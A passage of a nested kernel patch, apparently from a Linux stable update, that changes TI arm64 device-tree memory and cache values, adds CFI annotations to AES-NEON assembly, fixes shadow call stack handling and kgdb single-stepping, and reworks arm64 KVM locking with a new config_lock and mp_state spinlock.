+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index 576dbce80ad83..b08a083d722d4 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -26,8 +26,9 @@
+ 
+ 	memory@80000000 {
+ 		device_type = "memory";
+-		/* 2G RAM */
+-		reg = <0x00000000 0x80000000 0x00000000 0x80000000>;
++		/* 4G RAM */
++		reg = <0x00000000 0x80000000 0x00000000 0x80000000>,
++		      <0x00000008 0x80000000 0x00000000 0x80000000>;
+ 	};
+ 
+ 	reserved-memory {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+index 331d89fda29d0..f1ebaec404fbc 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index c935622f01028..bfa296dce3a31 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -1180,7 +1180,6 @@
+ 		ti,itap-del-sel-mmc-hs = <0xa>;
+ 		ti,itap-del-sel-ddr52 = <0x3>;
+ 		ti,trm-icp = <0x8>;
+-		ti,strobe-sel = <0x77>;
+ 		dma-coherent;
+ 	};
+ 
+diff --git a/arch/arm64/crypto/aes-neonbs-core.S b/arch/arm64/crypto/aes-neonbs-core.S
+index 7278a37c2d5cd..baf450717b24b 100644
+--- a/arch/arm64/crypto/aes-neonbs-core.S
++++ b/arch/arm64/crypto/aes-neonbs-core.S
+@@ -15,6 +15,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/assembler.h>
+ 
+ 	.text
+@@ -620,12 +621,12 @@ SYM_FUNC_END(aesbs_decrypt8)
+ 	.endm
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_encrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_encrypt)
+ 	__ecb_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_ecb_encrypt)
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_decrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_decrypt)
+ 	__ecb_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_ecb_decrypt)
+ 
+@@ -799,11 +800,11 @@ SYM_FUNC_END(__xts_crypt8)
+ 	ret
+ 	.endm
+ 
+-SYM_FUNC_START(aesbs_xts_encrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_encrypt)
+ 	__xts_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_xts_encrypt)
+ 
+-SYM_FUNC_START(aesbs_xts_decrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_decrypt)
+ 	__xts_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_xts_decrypt)
+ 
+diff --git a/arch/arm64/include/asm/debug-monitors.h b/arch/arm64/include/asm/debug-monitors.h
+index 7b7e05c02691c..13d437bcbf58c 100644
+--- a/arch/arm64/include/asm/debug-monitors.h
++++ b/arch/arm64/include/asm/debug-monitors.h
+@@ -104,6 +104,7 @@ void user_regs_reset_single_step(struct user_pt_regs *regs,
+ void kernel_enable_single_step(struct pt_regs *regs);
+ void kernel_disable_single_step(void);
+ int kernel_active_single_step(void);
++void kernel_rewind_single_step(struct pt_regs *regs);
+ 
+ #ifdef CONFIG_HAVE_HW_BREAKPOINT
+ int reinstall_suspended_bps(struct pt_regs *regs);
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 307a840b78865..f134c300cdcf1 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -191,6 +191,9 @@ struct kvm_arch {
+ 	/* Mandated version of PSCI */
+ 	u32 psci_version;
+ 
++	/* Protects VM-scoped configuration data */
++	struct mutex config_lock;
++
+ 	/*
+ 	 * If we encounter a data abort without valid instruction syndrome
+ 	 * information, report this to user space.  User space can (and
+@@ -482,6 +485,7 @@ struct kvm_vcpu_arch {
+ 
+ 	/* vcpu power state */
+ 	struct kvm_mp_state mp_state;
++	spinlock_t mp_state_lock;
+ 
+ 	/* Cache some mmu pages needed inside spinlock regions */
+ 	struct kvm_mmu_memory_cache mmu_page_cache;
+diff --git a/arch/arm64/include/asm/scs.h b/arch/arm64/include/asm/scs.h
+index ff7da1268a52a..13df982a08080 100644
+--- a/arch/arm64/include/asm/scs.h
++++ b/arch/arm64/include/asm/scs.h
+@@ -10,15 +10,16 @@
+ #ifdef CONFIG_SHADOW_CALL_STACK
+ 	scs_sp	.req	x18
+ 
+-	.macro scs_load tsk
+-	ldr	scs_sp, [\tsk, #TSK_TI_SCS_SP]
++	.macro scs_load_current
++	get_current_task scs_sp
++	ldr	scs_sp, [scs_sp, #TSK_TI_SCS_SP]
+ 	.endm
+ 
+ 	.macro scs_save tsk
+ 	str	scs_sp, [\tsk, #TSK_TI_SCS_SP]
+ 	.endm
+ #else
+-	.macro scs_load tsk
++	.macro scs_load_current
+ 	.endm
+ 
+ 	.macro scs_save tsk
+diff --git a/arch/arm64/kernel/debug-monitors.c b/arch/arm64/kernel/debug-monitors.c
+index 3da09778267ec..64f2ecbdfe5c2 100644
+--- a/arch/arm64/kernel/debug-monitors.c
++++ b/arch/arm64/kernel/debug-monitors.c
+@@ -438,6 +438,11 @@ int kernel_active_single_step(void)
+ }
+ NOKPROBE_SYMBOL(kernel_active_single_step);
+ 
++void kernel_rewind_single_step(struct pt_regs *regs)
++{
++	set_regs_spsr_ss(regs);
++}
++
+ /* ptrace API */
+ void user_enable_single_step(struct task_struct *task)
+ {
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index 11cb99c4d2987..80d763e165fc5 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -275,7 +275,7 @@ alternative_if ARM64_HAS_ADDRESS_AUTH
+ alternative_else_nop_endif
+ 1:
+ 
+-	scs_load tsk
++	scs_load_current
+ 	.else
+ 	add	x21, sp, #PT_REGS_SIZE
+ 	get_current_task tsk
+@@ -848,7 +848,7 @@ SYM_FUNC_START(cpu_switch_to)
+ 	msr	sp_el0, x1
+ 	ptrauth_keys_install_kernel x1, x8, x9, x10
+ 	scs_save x0
+-	scs_load x1
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(cpu_switch_to)
+ NOKPROBE(cpu_switch_to)
+@@ -876,19 +876,19 @@ NOKPROBE(ret_from_fork)
+  */
+ SYM_FUNC_START(call_on_irq_stack)
+ #ifdef CONFIG_SHADOW_CALL_STACK
+-	stp	scs_sp, xzr, [sp, #-16]!
++	get_current_task x16
++	scs_save x16
+ 	ldr_this_cpu scs_sp, irq_shadow_call_stack_ptr, x17
+ #endif
++
+ 	/* Create a frame record to save our LR and SP (implicit in FP) */
+ 	stp	x29, x30, [sp, #-16]!
+ 	mov	x29, sp
+ 
+ 	ldr_this_cpu x16, irq_stack_ptr, x17
+-	mov	x15, #IRQ_STACK_SIZE
+-	add	x16, x16, x15
+ 
+ 	/* Move to the new stack and call the function there */
+-	mov	sp, x16
++	add	sp, x16, #IRQ_STACK_SIZE
+ 	blr	x1
+ 
+ 	/*
+@@ -897,9 +897,7 @@ SYM_FUNC_START(call_on_irq_stack)
+ 	 */
+ 	mov	sp, x29
+ 	ldp	x29, x30, [sp], #16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	ldp	scs_sp, xzr, [sp], #16
+-#endif
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(call_on_irq_stack)
+ NOKPROBE(call_on_irq_stack)
+diff --git a/arch/arm64/kernel/head.S b/arch/arm64/kernel/head.S
+index 952e17bd1c0b4..b9c1a506798ea 100644
+--- a/arch/arm64/kernel/head.S
++++ b/arch/arm64/kernel/head.S
+@@ -404,7 +404,7 @@ SYM_FUNC_END(create_kernel_mapping)
+ 	stp	xzr, xzr, [sp, #S_STACKFRAME]
+ 	add	x29, sp, #S_STACKFRAME
+ 
+-	scs_load \tsk
++	scs_load_current
+ 
+ 	adr_l	\tmp1, __per_cpu_offset
+ 	ldr	w\tmp2, [\tsk, #TSK_TI_CPU]
+diff --git a/arch/arm64/kernel/kgdb.c b/arch/arm64/kernel/kgdb.c
+index cda9c1e9864f7..4e1f983df3d1c 100644
+--- a/arch/arm64/kernel/kgdb.c
++++ b/arch/arm64/kernel/kgdb.c
+@@ -224,6 +224,8 @@ int kgdb_arch_handle_exception(int exception_vector, int signo,
+ 		 */
+ 		if (!kernel_active_single_step())
+ 			kernel_enable_single_step(linux_regs);
++		else
++			kernel_rewind_single_step(linux_regs);
+ 		err = 0;
+ 		break;
+ 	default:
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index e57f8ae093875..f092c3672afcd 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -138,6 +138,16 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ {
+ 	int ret;
+ 
++	mutex_init(&kvm->arch.config_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Clue in lockdep that the config_lock must be taken inside kvm->lock */
++	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->lock);
++#endif
++
+ 	ret = kvm_share_hyp(kvm, kvm + 1);
+ 	if (ret)
+ 		return ret;
+@@ -336,6 +346,16 @@ int kvm_arch_vcpu_create(struct kvm_vcpu *vcpu)
+ {
+ 	int err;
+ 
++	spin_lock_init(&vcpu->arch.mp_state_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Inform lockdep that the config_lock is acquired after vcpu->mutex */
++	mutex_lock(&vcpu->mutex);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->mutex);
++#endif
++
+ 	/* Force users to call KVM_ARM_VCPU_INIT */
+ 	vcpu->arch.target = -1;
+ 	bitmap_zero(vcpu->arch.features, KVM_VCPU_MAX_FEATURES);
+@@ -453,34 +473,41 @@ void kvm_arch_vcpu_put(struct kvm_vcpu *vcpu)
+ 	vcpu->cpu = -1;
+ }
+ 
+-void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++static void __kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
+ 	kvm_make_request(KVM_REQ_SLEEP, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++{
++	spin_lock(&vcpu->arch.mp_state_lock);
++	__kvm_arm_vcpu_power_off(vcpu);
++	spin_unlock(&vcpu->arch.mp_state_lock);
++}
++
+ bool kvm_arm_vcpu_stopped(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_STOPPED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_STOPPED;
+ }
+ 
+ static void kvm_arm_vcpu_suspend(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_SUSPENDED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_SUSPENDED);
+ 	kvm_make_request(KVM_REQ_SUSPEND, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
+ static bool kvm_arm_vcpu_suspended(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_SUSPENDED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_SUSPENDED;
+ }
+ 
+ int kvm_arch_vcpu_ioctl_get_mpstate(struct kvm_vcpu *vcpu,
+ 				    struct kvm_mp_state *mp_state)
+ {
+-	*mp_state = vcpu->arch.mp_state;
++	*mp_state = READ_ONCE(vcpu->arch.mp_state);
+ 
+ 	return 0;
+ }
+@@ -490,12 +517,14 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ {
+ 	int ret = 0;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++
+ 	switch (mp_state->mp_state) {
+ 	case KVM_MP_STATE_RUNNABLE:
+-		vcpu->arch.mp_state = *mp_state;
++		WRITE_ONCE(vcpu->arch.mp_state, *mp_state);
+ 		break;
+ 	case KVM_MP_STATE_STOPPED:
+-		kvm_arm_vcpu_power_off(vcpu);
++		__kvm_arm_vcpu_power_off(vcpu);
+ 		break;
+ 	case KVM_MP_STATE_SUSPENDED:
+ 		kvm_arm_vcpu_suspend(vcpu);
+@@ -504,6 +533,8 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ 		ret = -EINVAL;
+ 	}
+ 
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	return ret;
+ }
+ 
+@@ -603,9 +634,9 @@ int kvm_arch_vcpu_run_pid_change(struct kvm_vcpu *vcpu)
+ 	if (kvm_vm_is_protected(kvm))
+ 		kvm_call_hyp_nvhe(__pkvm_vcpu_init_traps, vcpu);
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	set_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return ret;
+ }
+@@ -1223,7 +1254,7 @@ static int kvm_arch_vcpu_ioctl_vcpu_init(struct kvm_vcpu *vcpu,
+ 	if (test_bit(KVM_ARM_VCPU_POWER_OFF, vcpu->arch.features))
+ 		kvm_arm_vcpu_power_off(vcpu);
+ 	else
+-		vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
++		WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_RUNNABLE);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index cf4c495a43213..a8fe8e1bbaddf 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -951,7 +951,9 @@ int kvm_arm_vcpu_arch_set_attr(struct kvm_vcpu *vcpu,
+ 
+ 	switch (attr->group) {
+ 	case KVM_ARM_VCPU_PMU_V3_CTRL:
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = kvm_arm_pmu_v3_set_attr(vcpu, attr);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	case KVM_ARM_VCPU_TIMER_CTRL:
+ 		ret = kvm_arm_timer_set_attr(vcpu, attr);
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index 950e35b993d2b..1f5beebf62174 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -377,7 +377,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 	if (val & ~fw_reg_features)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags) &&
+ 	    val != *fw_reg_bmap) {
+@@ -387,7 +387,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 
+ 	WRITE_ONCE(*fw_reg_bmap, val);
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 5eca0cdd961df..99e990a472a57 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -876,7 +876,7 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	struct arm_pmu *arm_pmu;
+ 	int ret = -ENXIO;
+ 
+-	mutex_lock(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 	mutex_lock(&arm_pmus_lock);
+ 
+ 	list_for_each_entry(entry, &arm_pmus, entry) {
+@@ -896,7 +896,6 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	}
+ 
+ 	mutex_unlock(&arm_pmus_lock);
+-	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+ 
+@@ -904,22 +903,20 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ {
+ 	struct kvm *kvm = vcpu->kvm;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return -ENODEV;
+ 
+ 	if (vcpu->arch.pmu.created)
+ 		return -EBUSY;
+ 
+-	mutex_lock(&kvm->lock);
+ 	if (!kvm->arch.arm_pmu) {
+ 		/* No PMU set, get the default one */
+ 		kvm->arch.arm_pmu = kvm_pmu_probe_armpmu();
+-		if (!kvm->arch.arm_pmu) {
+-			mutex_unlock(&kvm->lock);
++		if (!kvm->arch.arm_pmu)
+ 			return -ENODEV;
+-		}
+ 	}
+-	mutex_unlock(&kvm->lock);
+ 
+ 	switch (attr->attr) {
+ 	case KVM_ARM_VCPU_PMU_V3_IRQ: {
+@@ -963,19 +960,13 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		     filter.action != KVM_PMU_EVENT_DENY))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&kvm->lock);
+-
+-		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags)) {
+-			mutex_unlock(&kvm->lock);
++		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags))
+ 			return -EBUSY;
+-		}
+ 
+ 		if (!kvm->arch.pmu_filter) {
+ 			kvm->arch.pmu_filter = bitmap_alloc(nr_events, GFP_KERNEL_ACCOUNT);
+-			if (!kvm->arch.pmu_filter) {
+-				mutex_unlock(&kvm->lock);
++			if (!kvm->arch.pmu_filter)
+ 				return -ENOMEM;
+-			}
+ 
+ 			/*
+ 			 * The default depends on the first applied filter.
+@@ -994,8 +985,6 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		else
+ 			bitmap_clear(kvm->arch.pmu_filter, filter.base_event, filter.nevents);
+ 
+-		mutex_unlock(&kvm->lock);
+-
+ 		return 0;
+ 	}
+ 	case KVM_ARM_VCPU_PMU_V3_SET_PMU: {
+diff --git a/arch/arm64/kvm/psci.c b/arch/arm64/kvm/psci.c
+index 7fbc4c1b9df04..5767e6baa61a2 100644
+--- a/arch/arm64/kvm/psci.c
++++ b/arch/arm64/kvm/psci.c
+@@ -62,6 +62,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	struct vcpu_reset_state *reset_state;
+ 	struct kvm *kvm = source_vcpu->kvm;
+ 	struct kvm_vcpu *vcpu = NULL;
++	int ret = PSCI_RET_SUCCESS;
+ 	unsigned long cpu_id;
+ 
+ 	cpu_id = smccc_get_arg1(source_vcpu);
+@@ -76,11 +77,15 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	if (!vcpu)
+ 		return PSCI_RET_INVALID_PARAMS;
++
++	spin_lock(&vcpu->arch.mp_state_lock);
+ 	if (!kvm_arm_vcpu_stopped(vcpu)) {
+ 		if (kvm_psci_version(source_vcpu) != KVM_ARM_PSCI_0_1)
+-			return PSCI_RET_ALREADY_ON;
++			ret = PSCI_RET_ALREADY_ON;
+ 		else
+-			return PSCI_RET_INVALID_PARAMS;
++			ret = PSCI_RET_INVALID_PARAMS;
++
++		goto out_unlock;
+ 	}
+ 
+ 	reset_state = &vcpu->arch.reset_state;
+@@ -96,7 +101,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	reset_state->r0 = smccc_get_arg3(source_vcpu);
+ 
+-	WRITE_ONCE(reset_state->reset, true);
++	reset_state->reset = true;
+ 	kvm_make_request(KVM_REQ_VCPU_RESET, vcpu);
+ 
+ 	/*
+@@ -108,7 +113,9 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
+ 	kvm_vcpu_wake_up(vcpu);
+ 
+-	return PSCI_RET_SUCCESS;
++out_unlock:
++	spin_unlock(&vcpu->arch.mp_state_lock);
++	return ret;
+ }
+ 
+ static unsigned long kvm_psci_vcpu_affinity_info(struct kvm_vcpu *vcpu)
+@@ -168,8 +175,11 @@ static void kvm_prepare_system_event(struct kvm_vcpu *vcpu, u32 type, u64 flags)
+ 	 * after this call is handled and before the VCPUs have been
+ 	 * re-initialized.
+ 	 */
+-	kvm_for_each_vcpu(i, tmp, vcpu->kvm)
+-		tmp->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	kvm_for_each_vcpu(i, tmp, vcpu->kvm) {
++		spin_lock(&tmp->arch.mp_state_lock);
++		WRITE_ONCE(tmp->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
++		spin_unlock(&tmp->arch.mp_state_lock);
++	}
+ 	kvm_make_all_cpus_request(vcpu->kvm, KVM_REQ_SLEEP);
+ 
+ 	memset(&vcpu->run->system_event, 0, sizeof(vcpu->run->system_event));
+@@ -229,7 +239,6 @@ static unsigned long kvm_psci_check_allowed_function(struct kvm_vcpu *vcpu, u32
+ 
+ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 	int ret = 1;
+@@ -254,9 +263,7 @@ static int kvm_psci_0_2_call(struct kvm_vcpu *vcpu)
+ 		kvm_psci_narrow_to_32bit(vcpu);
+ 		fallthrough;
+ 	case PSCI_0_2_FN64_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	case PSCI_0_2_FN_AFFINITY_INFO:
+ 		kvm_psci_narrow_to_32bit(vcpu);
+@@ -395,7 +402,6 @@ static int kvm_psci_1_x_call(struct kvm_vcpu *vcpu, u32 minor)
+ 
+ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ {
+-	struct kvm *kvm = vcpu->kvm;
+ 	u32 psci_fn = smccc_get_function(vcpu);
+ 	unsigned long val;
+ 
+@@ -405,9 +411,7 @@ static int kvm_psci_0_1_call(struct kvm_vcpu *vcpu)
+ 		val = PSCI_RET_SUCCESS;
+ 		break;
+ 	case KVM_PSCI_FN_CPU_ON:
+-		mutex_lock(&kvm->lock);
+ 		val = kvm_psci_vcpu_on(vcpu);
+-		mutex_unlock(&kvm->lock);
+ 		break;
+ 	default:
+ 		val = PSCI_RET_NOT_SUPPORTED;
+diff --git a/arch/arm64/kvm/reset.c b/arch/arm64/kvm/reset.c
+index e0267f672b8ab..8c346b3e41e0a 100644
+--- a/arch/arm64/kvm/reset.c
++++ b/arch/arm64/kvm/reset.c
+@@ -200,7 +200,7 @@ static int kvm_set_vm_width(struct kvm_vcpu *vcpu)
+ 
+ 	is32bit = vcpu_has_feature(vcpu, KVM_ARM_VCPU_EL1_32BIT);
+ 
+-	lockdep_assert_held(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_REG_WIDTH_CONFIGURED, &kvm->arch.flags)) {
+ 		/*
+@@ -253,17 +253,18 @@ int kvm_reset_vcpu(struct kvm_vcpu *vcpu)
+ 	bool loaded;
+ 	u32 pstate;
+ 
+-	mutex_lock(&vcpu->kvm->lock);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
+ 	ret = kvm_set_vm_width(vcpu);
+-	if (!ret) {
+-		reset_state = vcpu->arch.reset_state;
+-		WRITE_ONCE(vcpu->arch.reset_state.reset, false);
+-	}
+-	mutex_unlock(&vcpu->kvm->lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 
+ 	if (ret)
+ 		return ret;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++	reset_state = vcpu->arch.reset_state;
++	vcpu->arch.reset_state.reset = false;
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	/* Reset PMU outside of the non-preemptible section */
+ 	kvm_pmu_vcpu_reset(vcpu);
+ 
+diff --git a/arch/arm64/kvm/vgic/vgic-debug.c b/arch/arm64/kvm/vgic/vgic-debug.c
+index 78cde687383ca..07aa0437125a6 100644
+--- a/arch/arm64/kvm/vgic/vgic-debug.c
++++ b/arch/arm64/kvm/vgic/vgic-debug.c
+@@ -85,7 +85,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	struct kvm *kvm = s->private;
+ 	struct vgic_state_iter *iter;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	if (iter) {
+ 		iter = ERR_PTR(-EBUSY);
+@@ -104,7 +104,7 @@ static void *vgic_debug_start(struct seq_file *s, loff_t *pos)
+ 	if (end_of_vgic(iter))
+ 		iter = NULL;
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return iter;
+ }
+ 
+@@ -132,12 +132,12 @@ static void vgic_debug_stop(struct seq_file *s, void *v)
+ 	if (IS_ERR(v))
+ 		return;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	iter = kvm->arch.vgic.iter;
+ 	kfree(iter->lpi_array);
+ 	kfree(iter);
+ 	kvm->arch.vgic.iter = NULL;
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ }
+ 
+ static void print_dist_state(struct seq_file *s, struct vgic_dist *dist)
+diff --git a/arch/arm64/kvm/vgic/vgic-init.c b/arch/arm64/kvm/vgic/vgic-init.c
+index f6d4f4052555c..8c1d2d7128db6 100644
+--- a/arch/arm64/kvm/vgic/vgic-init.c
++++ b/arch/arm64/kvm/vgic/vgic-init.c
+@@ -74,9 +74,6 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 	unsigned long i;
+ 	int ret;
+ 
+-	if (irqchip_in_kernel(kvm))
+-		return -EEXIST;
+-
+ 	/*
+ 	 * This function is also called by the KVM_CREATE_IRQCHIP handler,
+ 	 * which had no chance yet to check the availability of the GICv2
+@@ -87,10 +84,20 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		!kvm_vgic_global_state.can_emulate_gicv2)
+ 		return -ENODEV;
+ 
++	/* Must be held to avoid race with vCPU creation */
++	lockdep_assert_held(&kvm->lock);
++
+ 	ret = -EBUSY;
+ 	if (!lock_all_vcpus(kvm))
+ 		return ret;
+ 
++	mutex_lock(&kvm->arch.config_lock);
++
++	if (irqchip_in_kernel(kvm)) {
++		ret = -EEXIST;
++		goto out_unlock;
++	}
++
+ 	kvm_for_each_vcpu(i, vcpu, kvm) {
+ 		if (vcpu_has_run_once(vcpu))
+ 			goto out_unlock;
+@@ -118,6 +125,7 @@ int kvm_vgic_create(struct kvm *kvm, u32 type)
+ 		INIT_LIST_HEAD(&kvm->arch.vgic.rd_regions);
+ 
+ out_unlock:
++	mutex_unlock(&kvm->arch.config_lock);
+ 	unlock_all_vcpus(kvm);
+ 	return ret;
+ }
+@@ -227,9 +235,9 @@ int kvm_vgic_vcpu_init(struct kvm_vcpu *vcpu)
+ 	 * KVM io device for the redistributor that belongs to this VCPU.
+ 	 */
+ 	if (dist->vgic_model == KVM_DEV_TYPE_ARM_VGIC_V3) {
+-		mutex_lock(&vcpu->kvm->lock);
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = vgic_register_redist_iodev(vcpu);
+-		mutex_unlock(&vcpu->kvm->lock);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 	}
+ 	return ret;
+ }
+@@ -250,7 +258,6 @@ static void kvm_vgic_vcpu_enable(struct kvm_vcpu *vcpu)
